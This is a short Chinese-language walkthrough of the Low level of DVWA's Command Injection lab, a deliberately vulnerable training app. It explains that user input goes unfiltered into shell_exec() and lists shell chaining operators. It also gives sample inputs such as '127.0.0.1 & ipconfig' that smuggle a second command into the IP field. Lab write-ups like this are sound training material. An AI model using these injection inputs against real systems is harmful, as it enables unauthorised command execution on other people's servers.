DVWA-Command Injection通关教程
Low
打开靶场,发现这是一个可以输入ip,测试连通性的界面
源码分析
这里直接将target
变量放入shell_exec()
执行ping
命令,没有进行任何过滤,用户端可以直接拼接特定的命令,来执行并获取想要的信息。
漏洞利用
A; B //A不论正确与否都会执行B
A&B //A后台运行,A和B同时执行
A&&B //A执行成功后才会执行B
A|B //A执行的输出结果作为B命令的参数,A不论正确与否,都会执行B
A||B //A执行失败后才会执行B命令
可以执行的有:
127.0.0.1 & ipconfig
127.0.0.1 && ipconfig
127.0.0.1 | ipconfig
111 || ipconfig